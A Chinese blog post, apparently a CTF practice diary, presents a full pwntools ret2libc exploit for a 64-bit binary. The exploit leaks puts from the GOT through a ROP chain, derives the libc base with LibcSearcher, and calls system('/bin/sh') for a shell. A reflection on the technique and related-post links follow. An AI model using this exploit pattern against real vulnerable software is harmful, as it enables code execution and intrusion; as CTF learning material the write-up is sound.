day6——ret2libc的终章

最新推荐文章于 2024-07-25 22:24:14 发布
最新推荐文章于 2024-07-25 22:24:14 发布
阅读量44 收藏
点赞数
分类专栏: 精华刷题集_pwn 文章标签: 学习 安全 网络安全 linux 笔记
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_73858054/article/details/134763776
版权

day6

ret2libc

基本上可以了,这个类型的题目,最后再来一题

思路

在这里插入图片描述
在这里插入图片描述

没找到明显的提权函数,还是直接泄露一下got表

ROPgadget --binary pwn --only 'pop|ret'

在这里插入图片描述
进IDA里找一下要用到的的地址
在这里插入图片描述

在这里插入图片描述
在这里插入图片描述

利用ROPgadget(一种方便找gadgets片段的工具)找到向rdi寄存器赋值的rdi以及用来吃掉返回值的ret。然后找到puts函数的plt地址以及got地址,用来进行got表泄露。在找到main函数地址,用来重复执行main函数。

找齐之后就可以进行第一次泄露了

exp上半部分:

from pwn import *
from LibcSearcher import *
# sh = remote("node4.anna.nssctf.cn",28983)
sh = process('./pwn')

puts_plt = 0x400520
puts_got = 0x601018
pop_rdi_ret = 0x400763
pop_ret = 0x400509
main_addr = 0x4006D6

payload = b'a'*0x18 + p64(pop_ret) + p64(pop_rdi_ret) + p64(puts_got) + p64(puts_plt) + p64(main_addr) + b'\x00'

sh.sendline(payload)

随后接受程序发来的got表后六位的地址信息,将该地址减去puts函数在libc中的相对基址的偏移,得到基址的绝对地址。

随后用基址的绝对地址加上system和str_bin_sh的相对偏移,得到其绝对地址,随后正常调用即可。

exp下半部分:

puts_addr = u64(sh.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))
libc = LibcSearcher("puts", puts_addr)
libc_base = puts_addr - libc.dump('puts')
system_addr = libc_base + libc.dump('system')
binsh_addr = libc_base + libc.dump('str_bin_sh')

payload = b'a'*0x18 + p64(pop_rdi_ret) + p64(binsh_addr) + p64(system_addr)

sh.sendline(payload)
sh.interactive()
反思

最后的最后,来说一下收获吧

这段时间对ret2libc的了解不断加深

首先,这类题目需要程序中加载有libc模块,并且没有对此进行限制,比如关闭输入输出流,让你没法进行got表泄露。其他的应该就没啥限制了吧,感觉这种方法的适用性挺大的(不要听我一个菜鸟胡说八道)。

下面来简单讲一下基本方法以及一些工具的使用

基本思路就是

  1. 找到可以用来输出的方法,把got表中的任意一个值泄露出来。
  2. 取得泄露的值,通过对比位置的方法找到对应libc版本,然后根据相对偏移量以及之前泄露的got来计算要用到函数在内存上的地址(绝对地址)。
  3. 利用得到地址编写攻击代码。

一般来说,要用的的工具都有ROPgadget,pwngdb,LibcSearcher。

当然,以上三个是我这段时间使用的工具,分别是用来进行查找gadgets片段、调试、以及对比查找libc库 的。

不足

讲一下我目前可以看到的自身的不足吧,我没见过开启PIE保护的这类题目,感觉这类题目应该会很不一样。有时间或者有机会一定要看一下。

进击的萝卜君
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
实验三——ret2libc3地址泄露
wwh的博客
04-22 1951
用【checksec】查看:不存在必要的保护 查看got表信息:【readelf -r ret2libc3】 所以我决定用泄露 __libc_strart_main 的地址,来判定libc的版本 这里插入代码 from pwn import * from LibcSearcher import * context.log_level='debug' context.terminal=['gn...
Performing a ret2libc Attack-InVoLuNTaRy
04-24
### 执行ret2libc攻击——InVoLuNTaRy #### 一、ret2libc攻击简介 **ret2libc**(返回到libc或返回到C库)是一种攻击技术,它允许攻击者在无需注入shellcode的情况下控制目标系统中的易受攻击进程。这种攻击方式...
pwn ——ret2libc3
qq_41696518的博客
07-06 815
ret2libc3
pwn基本ROP——ret2libc
turtlesd的博客
04-26 2287
ret2libc环境PLT表和GOT表ret2libc1原理漏洞分析使用checksec查看保护措施使用IDA32位进行调试获取偏移量payloadret2libc2原理漏洞分析checksec使用IDA进行调试payloadret2libc3原理漏洞分析checksec使用IDA调试payload 环境 retlibc1 ret2libc2 ret2libc3 PLT表和GOT表 在进行ret2libc学习之前,我们需要先了解一下PLT表与GOT表的内容。 Globle offset table(GOT)
pwn学习——ret2libc2
MrTreebook的博客
11-28 1044
pwn学习——ret2libc21.攻击原理2. ret2libc2的源代码3.checksec看一下保护4.exp 1.攻击原理 通过把函数返回地址直接指向系统库中的函数(如system函数),同时构造该函数的输入参数栈,就可以达到代码执行的目的。 正常堆栈布局: ret2libc执行system的堆栈布局: 本题和ret2libc1的区别就是程序中没有自带"/bin/sh",需要自己写进去 2. ret2libc2的源代码 #include <stdio.h> #include <
PWN —— ret2libc1
qq_41696518的博客
07-03 427
ret2libc1
【PWN · ret2libcret2libc1
Mr_Fmnwon的博客
05-08 1065
当函数运行到调用库函数时,程序将访问对应函数的plt表项,plt表项存着代码,代码分为两部分:第一部分,跳转到对应的got表。第二部分,查找函数的真实地址,修改got表内容。 got表项存着一个地址。然而这个地址并不一开始就是libc中函数的真实地址。 一开始,got表项中地址指向plt代码的第二部分。后来,因运行plt第二部分代码段,got表内容被修改为真实函数地址。依据以上,我们可以......分享几个实用的干货小技巧,不用IDA解决此题
pwn学习——ret2libc1
MrTreebook的博客
11-28 1266
pwn学习——ret2libc11.看一下程序的保护2.看一下main函数有没有溢出3.ROPgadget4.exp 1.看一下程序的保护 ➜ ret2libc1 checksec ret2libc1 Arch: i386-32-little RELRO: Partial RELRO Stack: No canary found NX: NX enabled PIE: No PIE (0x8048000) 2.看一
【PWN · ret2libcret2libc2
Mr_Fmnwon的博客
05-08 564
经过ret2libc1的洗礼,我们对ret2libc的做题模范有了基本的范式,然而实际的题目远没有如此直白和简单。本题就遇到了一个问题:"/bin/sh"字符串在程序中并不存在,怎么办?其实很简单:没有我们就自己输入。因为具体的原理在ret2libc1中已经很详细地讲述了,所以本篇博客主要复现解题过程。从最基本理解原理的ret2libc1,到有点花头的ret2libc2,值得展望的是,比赛的题目,远远难于此。但千里之行始于足下,掌握好这些基础的,掌握好这些原理,才能慢慢深入进阶。
【PWN · ret2libc】[2021 鹤城杯]babyof
Mr_Fmnwon的博客
05-30 1774
64位Linux和32位Linux确乎有着关于参数传递上的不同,然而无论哪种,关于ret2libc这一题型。如果仅仅是wiki上的三道题目,那还是远远不够的。故尝试通过本题,总结ret2libc的一般过程。过程包括通过puts/write来泄露got表中的puts/write的真实地址->计算libc的基址->libc基址+任意库函数相对于libc的偏移量=任意函数真实地址->libc基址+libc中'/bin/sh'偏移量='/bin/sh'地址,如此构造system('/bin/sh')
栈溢出实例--笔记三(ret2libc
一只青木呀
08-07 1372
栈溢出实例--笔记三(ret2libc)1、栈溢出含义及栈结构2、ret2libc基本思路3、实战3.1、二进制程序如下3.2、查看栈结构3.3、第一次栈溢出3.4、第二次栈溢出 1、栈溢出含义及栈结构 请参考栈溢出实例–笔记一(ret2text) 栈溢出实例–笔记二(ret2shellcode) 2、ret2libc基本思路 在当一个程序开启了NX(栈不可执行)的时候,我们没办法去写shellcode,而且程序中也没有system函数供我们调用的时候,那此时我们该如何做呢? 首先,程序本身没有system
ret2libc exploit
07-07
### Return-to-libc (ret2libc) Exploit详解 #### 引言 在深入探讨Return-to-libc(简称ret2libc)技术之前,我们先简要回顾一下这一领域的背景知识。随着网络安全领域的不断发展,攻击者与防御者的对抗也在不断...
ret2libc2pwn 入门题
02-11
pwn 入门题
ret2libc1pwn 入门题
02-11
pwn 入门题
17ret2libc1_64 pwn 入门题
02-11
pwn 入门题
AvaloniaUI的学习
最新发布
lishuangquan1987的博客
07-25 1044
官方中文文档:https://docs.avaloniaui.net/zh-Hans/docs/welcome。
Python编程学习第一篇——Python零基础快速入门(六)(4)异常处理
urhero的专栏
07-25 468
我们已经了解了Python的基本数据类型、变量和基本的逻辑控制语句,基于这些基础知识可以编写一些小程序了,但是在写程序的时候我们会发现,有时候程序并不是按我们预期的方向执行,有的直接报错,有的没有报错,却并未得到我们预期的结果。在这个例子中,除数为0会引发ZeroDivisionError异常,我们将异常信息赋值给变量e,并输出"除数不能为0"和异常信息。在这个例子中,由于除数不为0,所以没有发生ZeroDivisionError异常,代码会执行else语句块,并输出结果2.0。
学习测试12-车(略)
qq_44897733的博客
07-25 294
系统讲解,可以在懂车帝网站去了解汽车结构
Golang学习笔记20240725,Go语言基础语法
Python私教
07-25 661
如果我们在遍历的时候,不想要key或者value,也可以用下划线替代,下划线叫做匿名变量。go语言里面的switch语句每个case天生就是独立的,不需要加break。指针可以直接对内存地址进行操作。使用*表示指针,使用&取地址。切片在go语言里面非常常用,因为其有动态扩展的特性。运行方式3:goland右键运行。使用加号可以对字符串进行拼接。
pwn ret2libc原理
08-22
- *1* *2* [pwn学习——ret2libc2](https://blog.csdn.net/MrTreebook/article/details/121595367)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值